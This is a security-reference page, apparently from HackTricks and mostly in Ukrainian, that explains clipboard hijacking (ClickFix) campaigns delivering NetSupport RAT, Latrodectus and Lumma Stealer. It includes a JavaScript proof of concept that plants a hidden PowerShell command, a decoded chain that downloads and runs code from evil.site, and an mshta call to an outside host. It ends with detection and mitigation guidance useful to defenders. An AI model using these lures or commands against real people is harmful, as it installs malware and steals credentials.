Clipboard Hijacking (Pastejacking) Attacks
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
"Ніколи не вставляйте нічого, що ви не скопіювали самі." – стара, але все ще актуальна порада
Overview
Clipboard hijacking – також відомий як pastejacking – зловживає тим, що користувачі регулярно копіюють і вставляють команди, не перевіряючи їх. Зловмисна веб-сторінка (або будь-який контекст, що підтримує JavaScript, такий як Electron або настільний додаток) програмно вставляє текст, контрольований атакуючим, у системний буфер обміну. Жертви зазвичай заохочуються, за допомогою ретельно продуманих інструкцій соціальної інженерії, натиснути Win + R (діалог виконання), Win + X (швидкий доступ / PowerShell) або відкрити термінал і вставити вміст буфера обміну, негайно виконуючи довільні команди.
Оскільки жоден файл не завантажується і жоден вкладення не відкривається, техніка обходить більшість контролів безпеки електронної пошти та веб-контенту, які моніторять вкладення, макроси або безпосереднє виконання команд. Тому атака популярна в фішингових кампаніях, що постачають комерційні сімейства шкідливих програм, такі як NetSupport RAT, Latrodectus loader або Lumma Stealer.
JavaScript Proof-of-Concept
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
Старі кампанії використовували document.execCommand('copy')
, нові покладаються на асинхронний Clipboard API (navigator.clipboard.writeText
).
Потік ClickFix / ClearFake
- Користувач відвідує сайт з помилками в написанні або скомпрометований сайт (наприклад,
docusign.sa[.]com
) - Впроваджений ClearFake JavaScript викликає допоміжну функцію
unsecuredCopyToClipboard()
, яка безшумно зберігає Base64-кодований однолінійний PowerShell у буфер обміну. - HTML-інструкції кажуть жертві: “Натисніть Win + R, вставте команду та натисніть Enter, щоб вирішити проблему.”
powershell.exe
виконується, завантажуючи архів, що містить легітимний виконуваний файл та шкідливу DLL (класичне завантаження DLL).- Завантажувач розшифровує додаткові етапи, впроваджує shellcode та встановлює постійність (наприклад, заплановане завдання) – врешті-решт запускаючи NetSupport RAT / Latrodectus / Lumma Stealer.
Приклад ланцюга NetSupport RAT
powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe
(легітимний Java WebStart) шукає у своїй директоріїmsvcp140.dll
.- Зловмисна DLL динамічно вирішує API за допомогою GetProcAddress, завантажує два бінарних файли (
data_3.bin
,data_4.bin
) через curl.exe, розшифровує їх, використовуючи змінний XOR ключ"https://google.com/"
, інжектує фінальний shellcode і розпаковує client32.exe (NetSupport RAT) уC:\ProgramData\SecurityCheck_v1\
.
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- Завантажує
la.txt
за допомогою curl.exe - Виконує JScript завантажувач всередині cscript.exe
- Отримує MSI вантаж → скидає
libcef.dll
поряд з підписаним додатком → DLL sideloading → shellcode → Latrodectus.
Lumma Stealer через MSHTA
mshta https://iplogger.co/xxxx =+\\xxx
mshta виклик запускає прихований PowerShell скрипт, який отримує PartyContinued.exe
, витягує Boat.pst
(CAB), реконструює AutoIt3.exe
через extrac32
та конкатенацію файлів, а врешті-решт запускає .a3x
скрипт, який ексфільтрує облікові дані браузера на sumeriavgv.digital
.
Виявлення та полювання
Блакитні команди можуть поєднувати телеметрію буфера обміну, створення процесів та реєстру, щоб визначити зловживання pastejacking:
- Реєстр Windows:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
зберігає історію команд Win + R – шукайте незвичайні записи Base64 / обфусцировані. - Ідентифікатор події безпеки 4688 (Створення процесу), де
ParentImage
==explorer.exe
іNewProcessName
в {powershell.exe
,wscript.exe
,mshta.exe
,curl.exe
,cmd.exe
}. - Ідентифікатор події 4663 для створення файлів під
%LocalAppData%\Microsoft\Windows\WinX\
або тимчасових папок безпосередньо перед підозрілою подією 4688. - Датчики буфера обміну EDR (якщо присутні) – корелюйте
Clipboard Write
, за яким негайно слідує новий процес PowerShell.
Заходи пом'якшення
- Ускладнення браузера – вимкніть доступ на запис у буфер обміну (
dom.events.asyncClipboard.clipboardItem
тощо) або вимагайте жесту користувача. - Обізнаність у сфері безпеки – навчіть користувачів вводити чутливі команди або спочатку вставляти їх у текстовий редактор.
- Режим обмеженої мови PowerShell / Політика виконання + Контроль застосунків для блокування довільних однорядкових команд.
- Мережеві контролі – блокувати вихідні запити до відомих доменів pastejacking та C2 шкідливого ПЗ.
Схожі трюки
- Discord Invite Hijacking часто зловживає тим же підходом ClickFix після заманювання користувачів на шкідливий сервер: {{#ref}} discord-invite-hijacking.md {{#endref}}
Посилання
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.